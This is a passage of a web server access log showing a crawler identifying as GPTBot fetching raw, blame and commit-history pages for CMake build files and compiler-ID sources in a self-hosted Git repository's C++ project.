"/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42449] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21630] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11488] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15259] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10310] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11135] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11164] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14249] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33665] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10087] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10056] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43098] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 